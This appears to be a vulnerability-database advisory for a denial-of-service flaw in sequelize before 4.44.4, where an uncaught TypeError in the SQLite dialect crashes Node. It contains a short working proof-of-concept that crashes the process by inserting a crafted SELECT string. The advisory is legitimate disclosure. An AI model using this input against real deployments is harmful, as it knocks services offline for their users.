Denial of Service in sequelize

Versions of sequelize prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a TypeError exception for the results variable. The results value may be undefined and trigger the error on a .map call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.

The following proof-of-concept crashes the Node process:

const Sequelize = require(&#039;sequelize&#039;);

const sequelize = new Sequelize({
	dialect: &#039;sqlite&#039;,
	storage: &#039;database.sqlite&#039;
});

const TypeError = sequelize.define(&#039;TypeError&#039;, {
	name: Sequelize.STRING,
});

TypeError.sync({force: true}).then(() =&gt; {
	return TypeError.create({name: &quot;SELECT tbl_name FROM sqlite_master&quot;});
});

Recommendation

Upgrade to version 4.44.4 or later.

Published: Sep 3, 2020
Updated: Apr 14, 2023
GHSA: GHSA-fw4p-36j9-rrj3
Severity: Medium
Exploit:

No technical information available.

CWEs:

CWE-248

Affected Software
References

Software	From	Fixed in
sequelize	-	4.44.4

Vulnerability Database

Denial of Service in sequelize

Recommendation